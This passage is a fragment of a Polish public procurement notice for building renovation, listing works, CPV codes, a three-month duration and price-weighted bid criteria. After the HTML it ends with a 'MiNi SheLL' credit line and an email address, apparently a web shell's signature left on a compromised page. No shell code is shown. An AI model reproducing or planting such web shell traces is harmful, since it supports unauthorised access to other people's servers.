- częściowa wymiana ślusarki okiennej i drzwiowej
- roboty wyburzeniowe
- roboty murarskie
- roboty tynkarskie
- roboty malarskie
- remont toalet: płytkowanie ścian, posadzek, wymiana armatury i białego montażu
- naprawa posadzek w hali
- roboty elektryczne i instalacyjne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.22.20.00-0, 71.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin złożenia do zamawiającego pełnej dokumentacji projektowej wraz z potwierdzeniem złożenia wniosku - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com